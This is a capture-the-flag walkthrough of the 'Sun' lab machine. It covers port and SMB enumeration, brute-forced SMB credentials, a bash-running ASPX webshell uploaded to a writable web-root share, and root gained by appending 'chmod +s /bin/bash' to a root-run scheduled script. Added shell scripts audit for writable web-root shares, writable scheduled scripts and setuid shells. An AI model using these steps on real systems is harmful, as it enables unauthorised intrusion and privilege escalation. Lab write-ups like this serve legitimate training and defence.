# Lab setup
Download: Sun
NAT, IP: 192.168.1.144
# Penetration process
# Initial information gathering
```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http        nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Sun
139/tcp  open  netbios-ssn Samba smbd 4.6.2
445/tcp  open  netbios-ssn Samba smbd 4.6.2
8080/tcp open  http        nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Sun
|_http-open-proxy: Proxy might be redirecting requests
```
```
NT_STATUS_CONNECTION_REFUSED listing *
//192.168.1.144/IPC$     Mapping: N/A     Listing: N/A  Writing: N/A
//192.168.1.144/nobody   Mapping: DENIED  Listing: N/A  Writing: N/A
S-1-5-21-3376172362-2708036654-1072164461-501  SUN\nobody (Local User)
S-1-5-21-3376172362-2708036654-1072164461-513  SUN\None (Domain Group)
S-1-5-21-3376172362-2708036654-1072164461-1000 SUN\punt4n0 (Local User)
```
Port 80 gives no leads; the image probably has something embedded that needs extracting: `binwalk --dd='.*' sun.jpg --run-as=root`
I couldn't get anywhere with what was extracted.
The nobody share can't be accessed, so the next step is to enumerate credentials.
The `smb_login` module yields: punt4n0:sunday
Let's look at what's in nobody:
```
┌──(root㉿kali)-[~]
└─# smbclient //192.168.1.144/nobody -U punt4n0
Password for [WORKGROUP\punt4n0]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Apr  2 04:55:21 2024
  ..                                  D        0  Mon Apr  1 12:43:11 2024
  index.html                          N      263  Tue Apr  2 04:54:36 2024
  sun.jpg                             N    98346  Tue Apr  2 04:49:44 2024

		19480400 blocks of size 1024. 15768912 blocks available
smb: \>
```
That's the website's directory, so we're set: it's a .NET site, so upload a webshell. Adapt lines 11 and 12 of /usr/share/webshells/aspx/cmdasp.aspx for Linux:

```csharp
psi.FileName = "bash";
psi.Arguments = "-c "+arg;
```

Upload it, and browsing to it gives a command-execution point; from there just pop a shell.
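The root cause of this step is a file share that exports the web server's document root with write access. The following audit script is an added example, not part of the writeup or the target's configuration: it reads smb.conf text and flags every share that is writable and whose path sits under a given web root. The embedded configuration and its paths (/var/www/html, /srv/docs) are constructed assumptions, not values taken from the box.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit a Samba configuration for
# shares that export a web root with write access, which is the exposure
# used above (the "nobody" share turned out to be the site document root).
# Assumes standard smb.conf syntax; the configuration text is constructed
# and the paths in it are assumptions, not values from the target.

SAMPLE_SMB_CONF='[global]
   workgroup = WORKGROUP
   server role = standalone server

[nobody]
   comment = Web root, exported for editing
   path = /var/www/html
   browseable = yes
   writable = yes
   valid users = punt4n0

[docs]
   path = /srv/docs
   read only = yes'

# Reads smb.conf text on stdin and prints "<share> <path>" for every share
# that is writable (writable/writeable = yes, or read only = no) and whose
# path lies under the web root given as $1.
writable_webroot_shares() {
    awk -v webroot="$1" '
        function flush() {
            if (sec != "" && sec != "global" && writable && index(path, webroot) == 1)
                print sec, path
        }
        # New [section]: report the previous share, then reset its state
        /^[ \t]*\[/ {
            flush()
            sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/\].*$/, "", sec)
            path = ""; writable = 0
            next
        }
        /^[ \t]*[#;]/ { next }          # comment lines
        /=/ {
            key = $0; sub(/=.*/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key)
            val = $0; sub(/^[^=]*=/, "", val); gsub(/^[ \t]+|[ \t]+$/, "", val)
            key = tolower(key); lval = tolower(val)
            if (key == "path") path = val
            if ((key == "writable" || key == "writeable") && lval == "yes") writable = 1
            if (key == "read only" && lval == "no") writable = 1
        }
        END { flush() }'
}

if [ "${1:-}" = "--run" ]; then
    printf '%s\n' "$SAMPLE_SMB_CONF" | writable_webroot_shares /var/www
fi
```

Run it with `--run` to evaluate the embedded sample; on a live Samba host pipe the effective configuration through it instead, `testparm -s 2>/dev/null | writable_webroot_shares /var/www`. Any share it reports should either become `read only = yes` or be pointed at a directory outside the document root, so that an authenticated SMB user cannot turn file upload into code execution on the web server.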
The shell runs as punt4n0; looking around the directory turns up an id_rsa and a passphrase.
Solid.
# Privilege escalation
Log in over SSH with id_rsa; `cat .remember_password` holds the passphrase needed: Th3_p0w3r_0f_IIS
Information gathering turned up /opt/service.ps1.
Transferred pspy over ssh to check for scheduled tasks (wget didn't work, so I went via ssh).
There is one, and it is this service.ps1. Append to it:

```shell
echo 'chmod +s /bin/bash' >> service.ps1
```

then wait, and run `/bin/bash -p`. Root!
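Two misconfigurations make this escalation possible: a script executed by a root-owned scheduled task is writable by an unprivileged user, and nothing notices a shell gaining the setuid bit afterwards. The audit below is an added example, not code from the writeup, that checks for both. The crontab text it contains is constructed (the target's real scheduler entry is not shown on this page), and it assumes GNU or BSD `find` and `grep -E`.

```shell
#!/bin/sh
# Added example, not part of the writeup: a defensive audit for the two
# conditions the escalation above relied on, a script that a root-run
# scheduler executes but that a low-privilege user can modify, and a setuid
# shell left behind afterwards. Assumes GNU or BSD find and grep -E; the
# crontab text below is constructed, not taken from the target.

# Extract absolute script paths from crontab-style text read on stdin.
scripts_from_crontab() {
    grep -v '^[[:space:]]*#' | grep -oE '/[^[:space:]]+\.(sh|ps1|py|pl)' | sort -u
}

# For each path given, report it when group or others can write to it.
# A root-run job reading such a file lets its writers run code as root.
# Returns 1 when at least one finding was printed, 0 otherwise.
find_writable_scheduled_scripts() {
    rc=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        # -perm -g+w / -perm -o+w: group- or other-writable bit is set
        if [ -n "$(find "$f" -maxdepth 0 \( -perm -g+w -o -perm -o+w \) 2>/dev/null)" ]; then
            printf 'WRITABLE BY NON-OWNER: %s\n' "$f"
            ls -ld "$f"
            rc=1
        fi
    done
    return $rc
}

# List setuid files named like a shell under the given directories; a
# setuid /bin/bash is exactly what 'chmod +s /bin/bash' leaves behind and
# should never appear on a healthy system.
find_suid_shells() {
    find "$@" -xdev -type f -perm -4000 \
        \( -name bash -o -name sh -o -name dash -o -name zsh -o -name ksh \) 2>/dev/null
}

# Constructed sample of what a system crontab carrying the task above might contain
SAMPLE_CRONTAB='# m h dom mon dow user  command
*/5 * * * * root /usr/bin/pwsh /opt/service.ps1
0 3 * * *   root /usr/local/sbin/backup.sh >/dev/null 2>&1'

if [ "${1:-}" = "--run" ]; then
    # On a live host replace the sample with: cat /etc/crontab /etc/cron.d/*
    printf '%s\n' "$SAMPLE_CRONTAB" | scripts_from_crontab | while read -r s; do
        find_writable_scheduled_scripts "$s" || true
    done
    find_suid_shells /bin /usr/bin /usr/local/bin /sbin /usr/sbin
fi
```

Run with `--run` to audit the embedded sample and the usual binary directories. The fix for a reported script is to make it root-owned with mode 0755 or stricter (and to keep its parent directory non-writable, so it cannot be replaced rather than edited); a setuid shell should simply be reset with `chmod u-s`, and its appearance treated as an indicator of compromise, since there is no legitimate reason for one.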